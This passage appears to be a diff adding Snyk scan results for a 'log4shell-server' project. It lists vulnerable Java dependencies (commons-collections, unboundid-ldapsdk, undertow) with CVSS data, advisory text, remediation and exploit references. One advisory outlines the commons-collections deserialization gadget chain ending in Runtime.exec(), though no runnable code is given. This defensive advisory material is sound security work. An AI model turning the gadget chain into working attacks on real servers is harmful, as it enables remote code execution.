"version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMUNBOUNDID-32143", + "title": "User Impersonation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,4.0.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.0.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[,4.0.5)" + ], + "functionId": { + "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java", + "className": "SimpleBindRequest", + "functionName": "process" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.unboundid:unboundid-ldapsdk", + "references": [ + { + "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6", + "title": "GitHub Commit" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134", + "title": "NVD" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:19.854962Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7, + "modificationTime": "2024-03-11T09:49:40.956024Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:05.592817Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:19.854962Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:40.956024Z" + } + ], + "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)", + "epssDetails": { + "percentile": "0.80907", + "probability": "0.00729", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000134" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "com.unboundid:unboundid-ldapsdk", + "proprietary": false, + "creationTime": "2018-03-16T00:00:00Z", + "functions_new": [ + { + "version": [ + "[,4.0.5)" + ], + "functionId": { + "className": "com.unboundid.ldap.sdk.SimpleBindRequest", + "functionName": "process" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-03-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.unboundid", + "artifactId": "unboundid-ldapsdk" + }, + "publicationTime": "2018-04-01T14:18:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:40.956024Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "com.unboundid:unboundid-ldapsdk@3.1.1" + ], + "upgradePath": [ + false, + "com.unboundid:unboundid-ldapsdk@4.0.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.unboundid:unboundid-ldapsdk", + "version": "3.1.1" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-2391283", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.2.15.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.15.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8", + "title": "Github Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2010378", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:50.428787Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:48.070223Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:10.356697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:50.428787Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.070223Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) which would cause client side invocation timeout with certain calls made over HTTP2.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.15.Final or higher.\n## References\n- [Github Commit](https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2010378)\n", + "epssDetails": { + "percentile": "0.78402", + "probability": "0.00590", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-3859" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2022-02-02T11:20:49.957629Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-02-01T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2022-02-09T17:20:22.376852Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.070223Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.15.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-2871356", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.19.Final)", + "[2.3.0.Alpha1,2.3.0.Alpha2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.19.Final", + "2.3.0.Alpha2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1350", + "title": "GitHub PR" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095862", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://issues.redhat.com/browse/UNDERTOW-2133", + "title": "Undertow Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:53.809517Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:00.519226Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:09.755888Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:53.809517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.519226Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when a `POST` request comes through `AJP` and the request exceeds the `max-post-size` limit (`maxEntitySize`). The `AjpServerRequestConduit` implementation closes a connection without sending any response to the `client/proxy` which will result in a front-end proxy marking the backend worker as an error state and not forward requests to the worker for a while.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.19.Final, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748)\n- [GitHub Commit](https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1350)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2095862)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2133)\n", + "epssDetails": { + "percentile": "0.36318", + "probability": "0.00084", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-2053" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2022-06-15T13:53:50.957525Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-06-14T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2022-06-15T15:07:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.519226Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.19.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-3012383", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.18)", + "[2.3.0.Alpha1,2.3.0.Alpha2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.18", + "2.3.0.Alpha2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": 